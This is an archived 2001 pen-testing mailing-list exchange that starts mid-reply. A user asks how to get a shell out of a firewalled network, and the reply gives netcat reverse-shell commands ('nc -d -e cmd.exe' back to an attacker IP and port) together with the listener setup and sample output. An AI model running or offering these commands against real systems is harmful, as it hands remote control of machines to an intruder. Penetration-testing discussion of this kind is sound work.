sending a shell back to yourself.

On your local computer run netcat in listen mode:

    nc -l -p 8888

Execute netcat on the remote server such that it sends a connection back to you:

    nc -d -e cmd.exe X.X.X.X 8888

(X.X.X.X is your IP.) The netcat listener you set up should display something like this:

    Microsoft Windows [Version xxxx]
    (C) Copyright 1985-2000 Microsoft Corp.

    c:\>

-mdb

----Original Message Follows----
From: Ilici Ramirez <ilici_ramirezat_private>
To: pen-testat_private
Subject: Server initiated remote shell
Date: Fri, 21 Sep 2001 07:23:11 -0700 (PDT)

Hi,

Let's suppose that I can execute a program on an inside host on a network protected by a firewall. There is no way in. But there is a way out to www browsing on port 80. So the client could connect to any Internet address on port 80. What program should it execute to provide me with a shell? Of course I'm on the Internet with a listener. What listener? The firewall is a real stateful firewall, so no TCP ACK or ICMP encapsulations.

Have a nice weekend too.

Ilici R

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service.
For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Fri Sep 21 2001 - 16:37:02 PDT